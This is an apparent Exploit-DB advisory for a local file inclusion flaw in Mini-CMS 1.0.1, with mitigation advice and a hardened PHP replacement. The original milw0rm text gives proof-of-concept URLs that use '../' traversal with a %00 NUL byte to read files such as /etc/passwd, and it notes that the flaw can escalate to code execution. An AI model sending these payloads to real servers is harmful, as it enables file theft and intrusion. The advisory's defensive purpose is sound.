Vendor: Mini-CMS
By: cOndemned
CVSS: 7.5 (HIGH)
Type: Local File Inclusion
CWE: 22
Product Name: Mini-CMS
Affected Version From: 1.0.1
Affected Version To: 1.0.1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2008

Mini-CMS 1.0.1 (index.php) Multiple Local File Inclusion Vulnerabilities

Mini-CMS 1.0.1 builds the path of the file it includes from the user-supplied GET parameters page and admin without validating them. index.php appends ".php" to the parameter value and passes the result to file_exists() and require(). Neither the directory-traversal sequence "../" nor a NUL byte is filtered, so a request such as index.php?page=../../../../etc/passwd%00 escapes the page/ directory, and the URL-encoded NUL byte (%00) truncates the path before the appended ".php" suffix; file_exists() therefore succeeds and the arbitrary local file is included. Any PHP code in the included file is executed, so the flaw can be escalated to code execution when the attacker can get PHP code into a file the web server can read (for example a log file or an uploaded file).

Two caveats for anyone verifying this. First, the NUL-byte truncation relies on the PHP engine accepting paths that contain a NUL byte; PHP 5.3.4 and later reject such paths in file_exists() and require(), so on those versions the ".php" suffix cannot be stripped and only files ending in .php can be included, although the traversal itself remains. Second, $page defaults to "home", so the admin branch is only evaluated when the page/ check fails, that is, when page names a page file that does not exist; if page/home.php exists in the installation, the admin vector needs page set to a nonexistent name as well.

Mitigation:

Do not build include paths from untrusted input. Map the page and admin parameters to files through a fixed allowlist of page names, or reject any value that does not match a strict pattern such as ^[A-Za-z0-9_-]+$, so that "/", ".." and NUL bytes can never reach file_exists() or require(). As defence in depth, resolve the final path with realpath() and verify that it lies inside the intended page/ or admin/ directory, and run a PHP version that rejects NUL bytes in paths (5.3.4 or later). Restricting access to the application to trusted IP addresses reduces exposure but does not fix the flaw.
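The following is a hardened replacement for the dispatch logic shown in the index.php excerpt. It is an added example for this page, not Mini-CMS vendor code: the function names resolve_include() and get_param() and the constants PAGE_DIR and ADMIN_DIR are assumptions, while the page/ and admin/ directories and the page and admin parameters are the ones the vulnerable code uses. The self-check payloads are constructed from the proof of concept.

```php
<?php
// Added example (not Mini-CMS vendor code): hardened page/admin dispatch.
// Assumed names: resolve_include(), get_param(), PAGE_DIR, ADMIN_DIR. Needs PHP 7.1+.
declare(strict_types=1);

const PAGE_DIR  = __DIR__ . '/page';
const ADMIN_DIR = __DIR__ . '/admin';

/**
 * Map a user-supplied page name to a file inside $dir.
 * Returns the absolute path to include, or null if the name is not acceptable.
 */
function resolve_include(string $dir, string $name): ?string
{
    // 1. Syntactic allowlist. Only letters, digits, underscore and hyphen are
    //    accepted, so "/", "\", "." and NUL can never become part of the path.
    //    \A and \z anchor the whole string (a trailing newline would slip past "$").
    if (preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name) !== 1) {
        return null;
    }

    // 2. Defence in depth: resolve the final path and confirm it is still
    //    inside the intended directory. realpath() returns false for files
    //    that do not exist, which replaces the original file_exists() check.
    $base = realpath($dir);
    $path = realpath($dir . DIRECTORY_SEPARATOR . $name . '.php');
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

/** Read a GET parameter as a string; arrays (?page[]=x) and absent values become "". */
function get_param(string $key): string
{
    return isset($_GET[$key]) && is_string($_GET[$key]) ? $_GET[$key] : '';
}

if (PHP_SAPI === 'cli') {
    // Self-check of the allowlist when run from the command line. These are
    // constructed inputs modelled on the PoC; every one must be rejected.
    $rejected = [
        "../../../../etc/passwd\0",   // traversal plus NUL-byte truncation
        '../../../../etc/passwd',     // traversal without NUL (PHP >= 5.3.4 case)
        'home/../../config',          // traversal hidden behind a valid prefix
        "home\n",                     // trailing newline, would pass a "$"-anchored regex
        '',                           // empty name
    ];
    foreach ($rejected as $bad) {
        if (resolve_include(PAGE_DIR, $bad) !== null) {
            fwrite(STDERR, 'FAIL: accepted ' . json_encode($bad) . "\n");
            exit(1);
        }
    }
    echo "allowlist checks passed\n";
    exit(0);
}

$page  = get_param('page');
$admin = get_param('admin');
if ($page === '') {
    $page = 'home';   // same default as the original index.php
}

if (($target = resolve_include(PAGE_DIR, $page)) !== null) {
    require $target;
} elseif ($admin !== '' && ($target = resolve_include(ADMIN_DIR, $admin)) !== null) {
    require $target;
} else {
    http_response_code(404);
    echo 'Page not found';
}
```

Run from the command line (php index.php) the block only exercises the allowlist; under a web server it dispatches the same way the original does. The regular expression alone closes both the traversal and the NUL-byte vectors; the realpath() prefix check is there so that a later relaxation of the allowlist cannot silently reopen them.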

Exploit-DB raw data:

/*

	$Id: minicms-1.0.1-lfi.txt,v 0.1 2008/12/06 04:06:00 cOndemned Exp $
	
	Mini-CMS 1.0.1 (index.php) Multiple Local File Inclusion Vulnerabilities
	Discovered by cOndemned

	Download : http://www.bpowerhouse.info/mini_cms.htm
	
	Greetz : ZaBeaTy, str0ke, d2, sid.psycho, Adish, TBH & Avantura ;*

*/

Source of index.php

	[...]

	9.	$page = !empty($_GET['page']) ? $_GET['page'] : "home";
	10.	$admin = !empty($_GET['admin']) ? $_GET['admin'] : "";
	
	[...]
	
	80.	if (($page != "") && file_exists("page/" . $page . ".php")) {
	81.		require("page/" . $page . ".php");
	82.	} else if (($admin != "") && file_exists("admin/" . $admin . ".php")) {
	83.		require("admin/" . $admin . ".php");

	[...]
	

Proof of Concept

	http://[host]/[mini_cms_1.0.1_path]/index.php?page=../../../../[local_file]%00
	http://[host]/[mini_cms_1.0.1_path]/index.php?admin=../../../../[local_file]%00
	

It's the same shit as in Mini-Blog 1.0.1... I don't even know what to call it...
Maybe double fail? x]
	
	
EoF

# milw0rm.com [2008-12-07]